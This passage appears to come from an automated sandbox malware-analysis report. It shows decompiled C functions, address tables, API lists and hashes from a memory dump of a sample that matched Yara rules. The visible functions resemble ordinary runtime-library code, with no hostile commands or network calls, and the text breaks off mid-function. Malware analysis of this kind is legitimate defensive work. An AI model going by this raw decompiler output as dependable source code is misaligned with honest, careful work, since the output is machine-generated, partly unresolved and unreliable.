                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$Exception@8Throw$ExceptionRaise
                    • String ID: CryptoMaterial: this object does not support precomputation$StreamTransformation: this object doesn't support random access
                    • API String ID: 2363603681-320247676
                    • Opcode ID: 5dfd190b3158e9a9eec70b72c35b52b2283d1a07ac46ad3efc3b9ec67b3a691d
                    • Instruction ID: ffe5eba307e9615b4f8c6a2dde3212b82d030166861177521d1e98124e498797
                    • Opcode Fuzzy Hash: 5dfd190b3158e9a9eec70b72c35b52b2283d1a07ac46ad3efc3b9ec67b3a691d
                    • Instruction Fuzzy Hash: 8F017171A5020DABDB00EBD9D841BDEB7B8AB24B18F60841EA615B7150DB719E05CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E014057E4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                    				signed int _v8;
                    				short _v270;
                    				short _v272;
                    				char _v528;
                    				char _v700;
                    				signed int _v704;
                    				signed int _v708;
                    				short _v710;
                    				signed int* _v712;
                    				signed int _v716;
                    				signed int _v720;
                    				intOrPtr _v724;
                    				signed int* _v728;
                    				signed int _v732;
                    				signed int _v736;
                    				signed int _v740;
                    				signed int _v744;
                    				signed int _t149;
                    				void* _t156;
                    				signed int _t157;
                    				signed int _t158;
                    				intOrPtr _t159;
                    				signed int _t162;
                    				signed int _t163;
                    				signed int _t166;
                    				signed int _t167;
                    				intOrPtr _t169;
                    				signed int _t172;
                    				signed int _t173;
                    				signed int _t175;
                    				signed int _t176;
                    				signed int _t194;
                    				signed int _t195;
                    				signed int _t198;
                    				signed int _t203;
                    				signed int _t205;
                    				signed int _t211;
                    				intOrPtr* _t212;
                    				signed int _t223;
                    				intOrPtr _t226;
                    				intOrPtr* _t227;
                    				signed int _t229;
                    				signed int* _t233;
                    				signed int _t240;
                    				void* _t241;
                    				signed int _t242;
                    				intOrPtr _t244;
                    				signed int _t249;
                    				signed int _t251;
                    				signed int _t255;
                    				signed int* _t256;
                    				intOrPtr* _t257;
                    				short _t258;
                    				signed int _t260;
                    				signed int _t262;
                    				void* _t264;
                    				void* _t266;
                    
                    				_t260 = _t262;
                    				_t149 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t149 ^ _t260;
                    				_push(__ebx);
                    				_t205 = _a8;
                    				_push(__esi);
                    				_push(__edi);
                    				_t244 = _a4;
                    				_v744 = _t205;
                    				_v728 = E01406A01(_t205, __ecx, __edx) + 0x278;
                    				_push( &_v708);
                    				_t156 = E01404F2E(_t205, __edx, _t244, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
                    				_t264 = _t262 - 0x2e4 + 0x18;
                    				if(_t156 != 0) {
                    					_t11 = _t205 + 2; // 0x6
                    					_t249 = _t11 << 4;
                    					__eflags = _t249;
                    					_t157 =  &_v272;
                    					_v716 = _t249;
                    					_t240 =  *(_t249 + _t244);
                    					_t211 = _t240;
                    					while(1) {
                    						_v704 = _v704 & 0x00000000;
                    						__eflags =  *_t157 -  *_t211;
                    						_t251 = _v716;
                    						if( *_t157 !=  *_t211) {
                    							break;
                    						}
                    						__eflags =  *_t157;
                    						if( *_t157 == 0) {
                    							L8:
                    							_t158 = _v704;
                    						} else {
                    							_t258 =  *((intOrPtr*)(_t157 + 2));
                    							__eflags = _t258 -  *((intOrPtr*)(_t211 + 2));
                    							_v710 = _t258;
                    							_t251 = _v716;
                    							if(_t258 !=  *((intOrPtr*)(_t211 + 2))) {
                    								break;
                    							} else {
                    								_t157 = _t157 + 4;
                    								_t211 = _t211 + 4;
                    								__eflags = _v710;
                    								if(_v710 != 0) {
                    									continue;
                    								} else {
                    									goto L8;
                    								}
                    							}
                    						}
                    						L10:
                    						__eflags = _t158;
                    						if(_t158 != 0) {
                    							_t212 =  &_v272;
                    							_t241 = _t212 + 2;
                    							do {
                    								_t159 =  *_t212;
                    								_t212 = _t212 + 2;
                    								__eflags = _t159 - _v704;
                    							} while (_t159 != _v704);
                    							_v720 = (_t212 - _t241 >> 1) + 1;
                    							_t162 = E0140131B(_t212 - _t241 >> 1, 4 + ((_t212 - _t241 >> 1) + 1) * 2);
                    							_v732 = _t162;
                    							__eflags = _t162;
                    							if(_t162 == 0) {
                    								goto L1;
                    							} else {
                    								_v724 =  *((intOrPtr*)(_t251 + _t244));
                    								_t35 = _t205 * 4; // 0xa094
                    								_v736 =  *((intOrPtr*)(_t244 + _t35 + 0xa0));
                    								_t38 = _t244 + 8; // 0x8b56ff8b
                    								_v740 =  *_t38;
                    								_t221 =  &_v272;
                    								_v712 = _t162 + 4;
                    								_t166 = E013FF144(_t162 + 4, _v720,  &_v272);
                    								_t266 = _t264 + 0xc;
                    								__eflags = _t166;
                    								if(_t166 != 0) {
                    									_t167 = _v704;
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									E013FDA8E();
                    									asm("int3");
                    									_t169 =  *0x143a65c; // 0x0
                    									return _t169;
                    								} else {
                    									__eflags = _v272 - 0x43;
                    									 *((intOrPtr*)(_t251 + _t244)) = _v712;
                    									if(_v272 != 0x43) {
                    										L19:
                    										_t172 = E01404C3B(_t205, _t221, _t244,  &_v700);
                    										_t223 = _v704;
                    										 *(_t244 + 0xa0 + _t205 * 4) = _t172;
                    									} else {
                    										__eflags = _v270;
                    										if(_v270 != 0) {
                    											goto L19;
                    										} else {
                    											_t223 = _v704;
                    											 *(_t244 + 0xa0 + _t205 * 4) = _t223;
                    										}
                    									}
                    									__eflags = _t205 - 2;
                    									if(_t205 != 2) {
                    										__eflags = _t205 - 1;
                    										if(_t205 != 1) {
                    											__eflags = _t205 - 5;
                    											if(_t205 == 5) {
                    												 *((intOrPtr*)(_t244 + 0x14)) = _v708;
                    											}
                    										} else {
                    											 *((intOrPtr*)(_t244 + 0x10)) = _v708;
                    										}
                    									} else {
                    										_t256 = _v728;
                    										_t242 = _t223;
                    										_t233 = _t256;
                    										 *(_t244 + 8) = _v708;
                    										_v712 = _t256;
                    										_v720 = _t256[8];
                    										_v708 = _t256[9];
                    										while(1) {
                    											_t64 = _t244 + 8; // 0x8b56ff8b
                    											__eflags =  *_t64 -  *_t233;
                    											if( *_t64 ==  *_t233) {
                    												break;
                    											}
                    											_t257 = _v712;
                    											_t242 = _t242 + 1;
                    											_t203 =  *_t233;
                    											 *_t257 = _v720;
                    											_v708 = _t233[1];
                    											_t233 = _t257 + 8;
                    											 *((intOrPtr*)(_t257 + 4)) = _v708;
                    											_t205 = _v744;
                    											_t256 = _v728;
                    											_v720 = _t203;
                    											_v712 = _t233;
                    											__eflags = _t242 - 5;
                    											if(_t242 < 5) {
                    												continue;
                    											} else {
                    											}
                    											L27:
                    											__eflags = _t242 - 5;
                    											if(__eflags == 0) {
                    												_t88 = _t244 + 8; // 0x8b56ff8b
                    												_t194 = E01409CD8(__eflags, _v704, 1, 0x1423c10, 0x7f,  &_v528,  *_t88, 1);
                    												_t266 = _t266 + 0x1c;
                    												__eflags = _t194;
                    												_t195 = _v704;
                    												if(_t194 == 0) {
                    													_t256[1] = _t195;
                    												} else {
                    													do {
                    														 *(_t260 + _t195 * 2 - 0x20c) =  *(_t260 + _t195 * 2 - 0x20c) & 0x000001ff;
                    														_t195 = _t195 + 1;
                    														__eflags = _t195 - 0x7f;
                    													} while (_t195 < 0x7f);
                    													_t198 = E013F60A6( &_v528,  *0x14353a0, 0xfe);
                    													_t266 = _t266 + 0xc;
                    													__eflags = _t198;
                    													_t256[1] = 0 | _t198 == 0x00000000;
                    												}
                    												_t103 = _t244 + 8; // 0x8b56ff8b
                    												 *_t256 =  *_t103;
                    											}
                    											 *(_t244 + 0x18) = _t256[1];
                    											goto L38;
                    										}
                    										__eflags = _t242;
                    										if(_t242 != 0) {
                    											 *_t256 =  *(_t256 + _t242 * 8);
                    											_t256[1] =  *(_t256 + 4 + _t242 * 8);
                    											 *(_t256 + _t242 * 8) = _v720;
                    											 *(_t256 + 4 + _t242 * 8) = _v708;
                    										}
                    										goto L27;
                    									}
                    									L38:
                    									_t173 = _t205 * 0xc;
                    									_t110 = _t173 + 0x1423b50; // 0x13c50b8
                    									 *0x141a1a8(_t244);
                    									_t175 =  *((intOrPtr*)( *_t110))();
                    									_t226 = _v724;
                    									__eflags = _t175;
                    									if(_t175 == 0) {
                    										__eflags = _t226 - 0x14354a0;
                    										if(_t226 == 0x14354a0) {
                    											L43:
                    											_t176 = _v716;
                    										} else {
                    											_t255 = _t205 + _t205;
                    											__eflags = _t255;
                    											asm("lock xadd [eax], ecx");
                    											if(_t255 != 0) {
                    												goto L43;
                    											} else {
                    												_t128 = _t255 * 8; // 0x30ff068b
                    												E014012E1( *((intOrPtr*)(_t244 + _t128 + 0x28)));
                    												_t131 = _t255 * 8; // 0x30ff0c46
                    												E014012E1( *((intOrPtr*)(_t244 + _t131 + 0x24)));
                    												_t134 = _t205 * 4; // 0xa094
                    												E014012E1( *((intOrPtr*)(_t244 + _t134 + 0xa0)));
                    												_t176 = _v716;
                    												_t229 = _v704;
                    												 *(_t176 + _t244) = _t229;
                    												 *(_t244 + 0xa0 + _t205 * 4) = _t229;
                    											}
                    										}
                    										_t227 = _v732;
                    										 *_t227 = 1;
                    										_t163 =  *(_t176 + _t244);
                    										 *((intOrPtr*)(_t244 + 0x28 + (_t205 + _t205) * 8)) = _t227;
                    									} else {
                    										 *((intOrPtr*)(_v716 + _t244)) = _t226;
                    										_t115 = _t205 * 4; // 0xa094
                    										E014012E1( *((intOrPtr*)(_t244 + _t115 + 0xa0)));
                    										 *(_t244 + 0xa0 + _t205 * 4) = _v736;
                    										E014012E1(_v732);
                    										 *(_t244 + 8) = _v740;
                    										goto L1;
                    									}
                    									goto L2;
                    								}
                    							}
                    						} else {
                    							_t163 = _t240;
                    							goto L2;
                    						}
                    						goto L47;
                    					}
                    					asm("sbb eax, eax");
                    					_t158 = _t157 | 0x00000001;
                    					__eflags = _t158;
                    					goto L10;
                    				} else {
                    					L1:
                    					_t163 = 0;
                    					L2:
                    					return E013F268B(_t163, _v8 ^ _t260);
                    				}
                    				L47:
                    			}




























































                    0x014057e7
                    0x014057ef
                    0x014057f6
                    0x014057f9
                    0x014057fa
                    0x014057fd
                    0x01405801
                    0x01405802
                    0x01405805
                    0x01405815
                    0x01405821
                    0x01405838
                    0x0140583d
                    0x01405842
                    0x01405857
                    0x0140585a
                    0x0140585a
                    0x0140585d
                    0x01405863
                    0x01405869
                    0x0140586c
                    0x0140586e
                    0x01405871
                    0x01405878
                    0x0140587b
                    0x01405881
                    0x00000000
                    0x00000000
                    0x01405883
                    0x01405887
                    0x014058b0
                    0x014058b0
                    0x01405889
                    0x01405889
                    0x0140588d
                    0x01405891
                    0x01405898
                    0x0140589e
                    0x00000000
                    0x014058a0
                    0x014058a0
                    0x014058a3
                    0x014058a6
                    0x014058ae
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014058ae
                    0x0140589e
                    0x014058bd
                    0x014058bd
                    0x014058bf
                    0x014058c5
                    0x014058cb
                    0x014058ce
                    0x014058ce
                    0x014058d1
                    0x014058d4
                    0x014058d4
                    0x014058e4
                    0x014058f2
                    0x014058f7
                    0x014058fe
                    0x01405900
                    0x00000000
                    0x01405906
                    0x0140590c
                    0x01405912
                    0x01405919
                    0x0140591f
                    0x01405922
                    0x01405928
                    0x01405935
                    0x0140593c
                    0x01405941
                    0x01405944
                    0x01405946
                    0x01405b9f
                    0x01405ba5
                    0x01405ba6
                    0x01405ba7
                    0x01405ba8
                    0x01405ba9
                    0x01405baa
                    0x01405baf
                    0x01405bb0
                    0x01405bb5
                    0x0140594c
                    0x0140594c
                    0x0140595a
                    0x0140595d
                    0x01405978
                    0x0140597f
                    0x01405985
                    0x0140598b
                    0x0140595f
                    0x0140595f
                    0x01405967
                    0x00000000
                    0x01405969
                    0x01405969
                    0x0140596f
                    0x0140596f
                    0x01405967
                    0x01405992
                    0x01405995
                    0x01405ab2
                    0x01405ab5
                    0x01405ac2
                    0x01405ac5
                    0x01405acd
                    0x01405acd
                    0x01405ab7
                    0x01405abd
                    0x01405abd
                    0x0140599b
                    0x0140599b
                    0x014059a1
                    0x014059a9
                    0x014059ab
                    0x014059ae
                    0x014059b7
                    0x014059c0
                    0x014059c6
                    0x014059c6
                    0x014059c9
                    0x014059cb
                    0x00000000
                    0x00000000
                    0x014059cd
                    0x014059d3
                    0x014059d4
                    0x014059df
                    0x014059e7
                    0x014059ef
                    0x014059f2
                    0x014059f5
                    0x014059fb
                    0x01405a01
                    0x01405a07
                    0x01405a0d
                    0x01405a10
                    0x00000000
                    0x00000000
                    0x01405a12
                    0x01405a37
                    0x01405a37
                    0x01405a3a
                    0x01405a3e
                    0x01405a57
                    0x01405a5c
                    0x01405a5f
                    0x01405a61
                    0x01405a67
                    0x01405aa2
                    0x01405a69
                    0x01405a69
                    0x01405a6e
                    0x01405a76
                    0x01405a77
                    0x01405a77
                    0x01405a8e
                    0x01405a95
                    0x01405a98
                    0x01405a9d
                    0x01405a9d
                    0x01405aa5
                    0x01405aa8
                    0x01405aa8
                    0x01405aad
                    0x00000000
                    0x01405aad
                    0x01405a14
                    0x01405a16
                    0x01405a1b
                    0x01405a21
                    0x01405a2a
                    0x01405a33
                    0x01405a33
                    0x00000000
                    0x01405a16
                    0x01405ad0
                    0x01405ad0
                    0x01405ad4
                    0x01405adc
                    0x01405ae2
                    0x01405ae5
                    0x01405aeb
                    0x01405aed
                    0x01405b2d
                    0x01405b33
                    0x01405b7f
                    0x01405b7f
                    0x01405b35
                    0x01405b3a
                    0x01405b3a
                    0x01405b40
                    0x01405b44
                    0x00000000
                    0x01405b46
                    0x01405b46
                    0x01405b4a
                    0x01405b4f
                    0x01405b53
                    0x01405b58
                    0x01405b5f
                    0x01405b64
                    0x01405b6d
                    0x01405b73
                    0x01405b76
                    0x01405b76
                    0x01405b44
                    0x01405b85
                    0x01405b8d
                    0x01405b93
                    0x01405b96
                    0x01405aef
                    0x01405af5
                    0x01405af8
                    0x01405aff
                    0x01405b11
                    0x01405b18
                    0x01405b25
                    0x00000000
                    0x01405b25
                    0x00000000
                    0x01405aed
                    0x01405946
                    0x014058c1
                    0x014058c1
                    0x00000000
                    0x014058c1
                    0x00000000
                    0x014058bf
                    0x014058b8
                    0x014058ba
                    0x014058ba
                    0x00000000
                    0x01405844
                    0x01405844
                    0x01405844
                    0x01405846
                    0x01405856
                    0x01405856
                    0x00000000

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • _memcmp.LIBVCRUNTIME ref: 01405A8E
                    • _free.LIBCMT ref: 01405AFF
                    • _free.LIBCMT ref: 01405B18
                    • _free.LIBCMT ref: 01405B4A
                    • _free.LIBCMT ref: 01405B53
                    • _free.LIBCMT ref: 01405B5F
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast$_abort_memcmp
                    • String ID:
                    • API String ID: 1679612858-0
                    • Opcode ID: 847c2f66b76fc9430dba6c869ffe7fc065a3346e1fef145f1b460107986b7e97
                    • Instruction ID: e296ac00a2988aa64fe3f5a004c9aa6c8a4e2027997817bbfab711387277b1ed
                    • Opcode Fuzzy Hash: 847c2f66b76fc9430dba6c869ffe7fc065a3346e1fef145f1b460107986b7e97
                    • Instruction Fuzzy Hash: 4DB14F7590121A9FDB25DF19C884BAEB7B4FF58314F5045AED909AB3A0E730AE90CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E014095BC(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				int _v12;
                    				void* _v24;
                    				void* __ebp;
                    				signed int _t49;
                    				signed int _t54;
                    				int _t57;
                    				signed int _t59;
                    				short* _t61;
                    				signed int _t65;
                    				short* _t69;
                    				int _t77;
                    				short* _t80;
                    				signed int _t86;
                    				signed int _t89;
                    				void* _t94;
                    				void* _t95;
                    				int _t97;
                    				short* _t100;
                    				int _t102;
                    				int _t104;
                    				signed int _t105;
                    				short* _t106;
                    				void* _t109;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t49 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t49 ^ _t105;
                    				_t102 = _a20;
                    				if(_t102 > 0) {
                    					_t77 = E014012C5(_a16, _t102);
                    					_t109 = _t77 - _t102;
                    					_t4 = _t77 + 1; // 0x1
                    					_t102 = _t4;
                    					if(_t109 >= 0) {
                    						_t102 = _t77;
                    					}
                    				}
                    				_t97 = _a32;
                    				if(_t97 == 0) {
                    					_t97 =  *( *_a4 + 8);
                    					_a32 = _t97;
                    				}
                    				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
                    				_v12 = _t54;
                    				if(_t54 == 0) {
                    					L38:
                    					return E013F268B(_t54, _v8 ^ _t105);
                    				} else {
                    					_t94 = _t54 + _t54;
                    					_t84 = _t94 + 8;
                    					asm("sbb eax, eax");
                    					if((_t94 + 0x00000008 & _t54) == 0) {
                    						_t80 = 0;
                    						__eflags = 0;
                    						L14:
                    						if(_t80 == 0) {
                    							L36:
                    							_t104 = 0;
                    							L37:
                    							E013F1B60(_t80);
                    							_t54 = _t104;
                    							goto L38;
                    						}
                    						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
                    						_t120 = _t57;
                    						if(_t57 == 0) {
                    							goto L36;
                    						}
                    						_t99 = _v12;
                    						_t59 = E01407224(_t84, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0);
                    						_t104 = _t59;
                    						if(_t104 == 0) {
                    							goto L36;
                    						}
                    						if((_a12 & 0x00000400) == 0) {
                    							_t95 = _t104 + _t104;
                    							_t86 = _t95 + 8;
                    							__eflags = _t95 - _t86;
                    							asm("sbb eax, eax");
                    							__eflags = _t86 & _t59;
                    							if((_t86 & _t59) == 0) {
                    								_t100 = 0;
                    								__eflags = 0;
                    								L30:
                    								__eflags = _t100;
                    								if(__eflags == 0) {
                    									L35:
                    									E013F1B60(_t100);
                    									goto L36;
                    								}
                    								_t61 = E01407224(_t86, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
                    								__eflags = _t61;
                    								if(_t61 == 0) {
                    									goto L35;
                    								}
                    								_push(0);
                    								_push(0);
                    								__eflags = _a28;
                    								if(_a28 != 0) {
                    									_push(_a28);
                    									_push(_a24);
                    								} else {
                    									_push(0);
                    									_push(0);
                    								}
                    								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
                    								__eflags = _t104;
                    								if(_t104 != 0) {
                    									E013F1B60(_t100);
                    									goto L37;
                    								} else {
                    									goto L35;
                    								}
                    							}
                    							_t89 = _t95 + 8;
                    							__eflags = _t95 - _t89;
                    							asm("sbb eax, eax");
                    							_t65 = _t59 & _t89;
                    							_t86 = _t95 + 8;
                    							__eflags = _t65 - 0x400;
                    							if(_t65 > 0x400) {
                    								__eflags = _t95 - _t86;
                    								asm("sbb eax, eax");
                    								_t100 = E0140131B(_t86, _t65 & _t86);
                    								_pop(_t86);
                    								__eflags = _t100;
                    								if(_t100 == 0) {
                    									goto L35;
                    								}
                    								 *_t100 = 0xdddd;
                    								L28:
                    								_t100 =  &(_t100[4]);
                    								goto L30;
                    							}
                    							__eflags = _t95 - _t86;
                    							asm("sbb eax, eax");
                    							E013F2CE0();
                    							_t100 = _t106;
                    							__eflags = _t100;
                    							if(_t100 == 0) {
                    								goto L35;
                    							}
                    							 *_t100 = 0xcccc;
                    							goto L28;
                    						}
                    						_t69 = _a28;
                    						if(_t69 == 0) {
                    							goto L37;
                    						}
                    						_t124 = _t104 - _t69;
                    						if(_t104 > _t69) {
                    							goto L36;
                    						}
                    						_t104 = E01407224(0, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
                    						if(_t104 != 0) {
                    							goto L37;
                    						}
                    						goto L36;
                    					}
                    					asm("sbb eax, eax");
                    					_t71 = _t54 & _t94 + 0x00000008;
                    					_t84 = _t94 + 8;
                    					if((_t54 & _t94 + 0x00000008) > 0x400) {
                    						__eflags = _t94 - _t84;
                    						asm("sbb eax, eax");
                    						_t80 = E0140131B(_t84, _t71 & _t84);
                    						_pop(_t84);
                    						__eflags = _t80;
                    						if(__eflags == 0) {
                    							goto L36;
                    						}
                    						 *_t80 = 0xdddd;
                    						L12:
                    						_t80 =  &(_t80[4]);
                    						goto L14;
                    					}
                    					asm("sbb eax, eax");
                    					E013F2CE0();
                    					_t80 = _t106;
                    					if(_t80 == 0) {
                    						goto L36;
                    					}
                    					 *_t80 = 0xcccc;
                    					goto L12;
                    				}
                    			}



























                    0x014095c1
                    0x014095c2
                    0x014095c3
                    0x014095ca
                    0x014095cf
                    0x014095d5
                    0x014095db
                    0x014095e1
                    0x014095e4
                    0x014095e4
                    0x014095e7
                    0x014095e9
                    0x014095e9
                    0x014095e7
                    0x014095eb
                    0x014095f0
                    0x014095f7
                    0x014095fa
                    0x014095fa
                    0x01409616
                    0x0140961c
                    0x01409621
                    0x014097b4
                    0x014097c7
                    0x01409627
                    0x01409627
                    0x0140962a
                    0x0140962f
                    0x01409633
                    0x01409687
                    0x01409687
                    0x01409689
                    0x0140968b
                    0x014097a9
                    0x014097a9
                    0x014097ab
                    0x014097ac
                    0x014097b2
                    0x00000000
                    0x014097b2
                    0x0140969c
                    0x014096a2
                    0x014096a4
                    0x00000000
                    0x00000000
                    0x014096aa
                    0x014096bc
                    0x014096c1
                    0x014096c5
                    0x00000000
                    0x00000000
                    0x014096d2
                    0x0140970c
                    0x0140970f
                    0x01409712
                    0x01409714
                    0x01409716
                    0x01409718
                    0x01409764
                    0x01409764
                    0x01409766
                    0x01409766
                    0x01409768
                    0x014097a2
                    0x014097a3
                    0x00000000
                    0x014097a8
                    0x0140977c
                    0x01409781
                    0x01409783
                    0x00000000
                    0x00000000
                    0x01409787
                    0x01409788
                    0x01409789
                    0x0140978c
                    0x014097c8
                    0x014097cb
                    0x0140978e
                    0x0140978e
                    0x0140978f
                    0x0140978f
                    0x0140979c
                    0x0140979e
                    0x014097a0
                    0x014097d1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014097a0
                    0x0140971a
                    0x0140971d
                    0x0140971f
                    0x01409721
                    0x01409723
                    0x01409726
                    0x0140972b
                    0x01409746
                    0x01409748
                    0x01409752
                    0x01409754
                    0x01409755
                    0x01409757
                    0x00000000
                    0x00000000
                    0x01409759
                    0x0140975f
                    0x0140975f
                    0x00000000
                    0x0140975f
                    0x0140972d
                    0x0140972f
                    0x01409733
                    0x01409738
                    0x0140973a
                    0x0140973c
                    0x00000000
                    0x00000000
                    0x0140973e
                    0x00000000
                    0x0140973e
                    0x014096d4
                    0x014096d9
                    0x00000000
                    0x00000000
                    0x014096df
                    0x014096e1
                    0x00000000
                    0x00000000
                    0x014096fd
                    0x01409701
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01409707
                    0x0140963a
                    0x0140963c
                    0x0140963e
                    0x01409646
                    0x01409665
                    0x01409667
                    0x01409671
                    0x01409673
                    0x01409674
                    0x01409676
                    0x00000000
                    0x00000000
                    0x0140967c
                    0x01409682
                    0x01409682
                    0x00000000
                    0x01409682
                    0x0140964a
                    0x0140964e
                    0x01409653
                    0x01409657
                    0x00000000
                    0x00000000
                    0x0140965d
                    0x00000000
                    0x0140965d

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,?,00000000,?,?,?,0140980D,00000001,00000001,?), ref: 01409616
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0140980D,00000001,00000001,?,00000000,?,?), ref: 0140969C
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 01409796
                    • __freea.LIBCMT ref: 014097A3
                      • Part of subcall function 0140131B: HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    • __freea.LIBCMT ref: 014097AC
                    • __freea.LIBCMT ref: 014097D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide__freea$AllocHeap
                    • String ID:
                    • API String ID: 3147120248-0
                    • Opcode ID: 9732d6e5b4b95c49d9a702815c7994bcc44e4db3dac8af5c3f5b42f2e478967b
                    • Instruction ID: 273d4b1880e68debf881e281f6b60062a80e269705aad7d72dc21c4f7ae9f114
                    • Opcode Fuzzy Hash: 9732d6e5b4b95c49d9a702815c7994bcc44e4db3dac8af5c3f5b42f2e478967b
                    • Instruction Fuzzy Hash: C051E873610206EBEB268E6ADC40EAB7BA9EB90654F15063EFE08D71A1DB35DC50C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E01400E84(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				char _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				char* _v44;
                    				char _v48;
                    				void* __ecx;
                    				signed int _t67;
                    				signed int _t70;
                    				signed int _t71;
                    				signed int _t75;
                    				intOrPtr _t76;
                    				signed int _t79;
                    				signed int _t86;
                    				intOrPtr _t88;
                    				void* _t97;
                    				signed int _t99;
                    				void* _t101;
                    				void* _t103;
                    				void* _t108;
                    				signed int _t112;
                    				signed int _t113;
                    				signed int _t116;
                    				void* _t120;
                    				signed int _t123;
                    				signed int _t125;
                    				intOrPtr _t126;
                    				signed int _t128;
                    				intOrPtr _t130;
                    				signed int _t131;
                    				void* _t135;
                    				void* _t136;
                    				void* _t138;
                    
                    				_t120 = __edx;
                    				_t97 = __ebx;
                    				_push(_t101);
                    				if(_a8 != 0) {
                    					_push(__esi);
                    					_push(__edi);
                    					_t123 = 0;
                    					_t67 = E013FF59B( &_v8, 0, 0, _a8, 0x7fffffff);
                    					_t136 = _t135 + 0x14;
                    					__eflags = _t67;
                    					if(_t67 == 0) {
                    						L5:
                    						_t128 = E014009B2(_t101, _v8, 2);
                    						_pop(_t103);
                    						__eflags = _t128;
                    						if(_t128 == 0) {
                    							L11:
                    							E014012E1(_t128);
                    							_t70 = _t123;
                    							goto L12;
                    						} else {
                    							_t71 = E013FF59B(_t123, _t128, _v8, _a8, 0xffffffff);
                    							_t136 = _t136 + 0x14;
                    							__eflags = _t71;
                    							if(_t71 == 0) {
                    								_t123 = E014052E6(_t103, _a4, _t128);
                    								goto L11;
                    							} else {
                    								__eflags = _t71 - 0x16;
                    								if(_t71 == 0x16) {
                    									goto L13;
                    								} else {
                    									__eflags = _t71 - 0x22;
                    									if(_t71 != 0x22) {
                    										goto L11;
                    									} else {
                    										goto L13;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						__eflags = _t67 - 0x16;
                    						if(_t67 == 0x16) {
                    							L13:
                    							_push(_t123);
                    							_push(_t123);
                    							_push(_t123);
                    							_push(_t123);
                    							E013FDA8E();
                    							asm("int3");
                    							E013F3660(0x14339c8, 0x1c);
                    							_t130 = _a4;
                    							_t75 = E01400E84(_t97, _t120, _t123, _t130, _t130, _a8);
                    							_t108 = _t123;
                    							_t125 = _t75;
                    							__eflags = _t125;
                    							if(_t125 != 0) {
                    								_t76 = E01406A01(_t97, _t108, _t120);
                    								_v40 = _t76;
                    								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
